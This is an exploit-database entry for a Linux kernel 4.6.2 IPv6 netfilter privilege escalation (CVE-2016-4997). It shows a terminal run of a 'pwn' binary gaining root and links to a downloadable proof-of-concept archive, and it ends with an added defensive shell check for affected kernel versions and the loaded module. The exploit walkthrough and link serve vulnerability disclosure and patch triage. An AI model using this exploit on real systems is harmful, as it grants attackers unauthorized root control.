Linux Kernel 4.6.2 (Ubuntu 16.04.1) – ‘IP6T_SO_SET_REPLACE’ Local Privilege Escalation

  • Author: Qian Zhang
    Date: 2016-10-10
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/40489/
  • # Exploit Title: Linux kernel <= 4.6.2 - Local Privileges Escalation via IP6T_SO_SET_REPLACE compat setsockopt call
    # Date: 2016.10.8
    # Exploit Author: Qian Zhang@MarvelTeam Qihoo 360
    # Version: Linux kernel <= 4.6.2
    # Tested on: Ubuntu 16.04.1 LTS Linux 4.4.0-21-generic
    # CVE: CVE-2016-4997
    # Reference: http://www.openwall.com/lists/oss-security/2016/09/29/10
    # Contact: tyrande000@gmail.com
    
    #DESCRIPTION
    #===========
    #The IPv6 netfilter subsystem in the Linux kernel through 4.6.2 does not validate certain offset fields,
    #which allows local users to escalate privileges via an IP6T_SO_SET_REPLACE compat setsockopt call with ip6_tables module loaded.
    
    zhang_q@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE$ ls
    compile.sh  enjoy  enjoy.c  pwn  pwn.c  version.h
    zhang_q@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE$ sudo modprobe ip6_tables
    [sudo] password for zhang_q: 
    zhang_q@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE$ ./pwn 
    pwn begin, let the bullets fly . . .
    and wait for a minute . . .
    pwn over, let's enjoy!
    preparing payload . . .
    trigger modified tty_release . . .
    got root, enjoy :)
    root@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# 
    root@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# id
    uid=0(root) gid=0(root) groups=0(root)
    root@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# hostnamectl 
     Static hostname: ubuntu
     Icon name: computer-vm
     Chassis: vm
    Machine ID: 355cdf4ce8a048288640c2aa933c018f
    Virtualization: vmware
    Operating System: Ubuntu 16.04.1 LTS
    Kernel: Linux 4.4.0-21-generic
    Architecture: x86-64
    root@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# 
    
    
    Proof of Concept:
    https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40489.zip
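
A triage check built from the two preconditions the description names (kernel version <= 4.6.2 and a loaded ip6_tables module), added here as an example and not part of the original exploit-db entry. The function names and the sample /proc/modules lines are constructed; a version match is only an indicator, on the assumption that distribution kernels may carry a backported fix under an older version number.

```shell
#!/bin/sh
# Added triage example; thresholds taken from the advisory text:
# upstream kernel <= 4.6.2 and the ip6_tables module loaded.

# Return 0 if RELEASE (e.g. "4.4.0-21-generic") is <= 4.6.2 upstream.
# Assumption: distro kernels may carry a backported fix under an old version
# number, so a match means "check the vendor changelog", not "vulnerable".
kernel_in_range() {
    ver=${1%%-*}                        # drop "-21-generic", "-rc1", ...
    old_ifs=$IFS; IFS=.
    set -- $ver                         # split into major minor patch
    IFS=$old_ifs
    maj=${1%%[!0-9]*}; min=${2%%[!0-9]*}; pat=${3%%[!0-9]*}
    maj=${maj:-0}; min=${min:-0}; pat=${pat:-0}
    [ "$maj" -lt 4 ] && return 0
    [ "$maj" -gt 4 ] && return 1
    [ "$min" -lt 6 ] && return 0
    [ "$min" -gt 6 ] && return 1
    [ "$pat" -le 2 ]
}

# Return 0 if module NAME is listed in MODFILE (/proc/modules format, or "-"
# for stdin). Matches the first field exactly; built-in code is not listed.
module_loaded() {
    awk -v m="$1" '$1 == m { found = 1 } END { exit !found }' "$2" 2>/dev/null
}

# Print "out-of-range", "exposed" (kernel in range, module loaded) or
# "latent" (kernel in range, module not currently loaded).
exposure_verdict() {
    if ! kernel_in_range "$1"; then echo out-of-range
    elif module_loaded ip6_tables "$2"; then echo exposed
    else echo latent
    fi
}

# Constructed /proc/modules sample matching the host in the transcript.
sample_modules() {
    cat <<'EOF'
ip6_tables 28672 0 - Live 0x0000000000000000
x_tables 36864 1 ip6_tables, Live 0x0000000000000000
EOF
}

echo "sample host: $(sample_modules | exposure_verdict 4.4.0-21-generic -)"
echo "this host:   $(exposure_verdict "$(uname -r)" /proc/modules)"
```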